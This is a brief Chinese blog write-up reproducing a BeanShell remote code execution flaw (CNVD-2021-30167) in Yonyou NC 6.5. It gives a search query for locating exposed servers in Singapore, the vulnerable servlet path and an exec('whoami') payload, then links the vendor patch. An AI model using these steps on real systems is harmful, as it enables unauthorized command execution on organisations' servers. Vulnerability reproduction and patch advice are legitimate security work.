其他
CNVD-2021-30167:用友NC BeanShell RCE复现
本文字数:361阅读时长:2~3min声明:请勿用作违法用途,否则后果自负
用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。
用友NC6.5版本
国外在线环境
title=="YONYOU NC" && country="SG"
1、访问
/servlet/~ic/bsh.servlet.BshServlet
得到如图:
2、我们发现这里有执行代码的接口我们输入payload如:exec("whoami");
即可看到命令执行成功
该漏洞为第三方jar包漏洞导致,用友NC官方已发布安全补丁,建议使用该产品的用户及时安装该漏洞补丁包。
补丁下载链接:
http://umc.yonyou.com/ump/querypatchdetailedmng? PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19
安全路上,与你并肩前行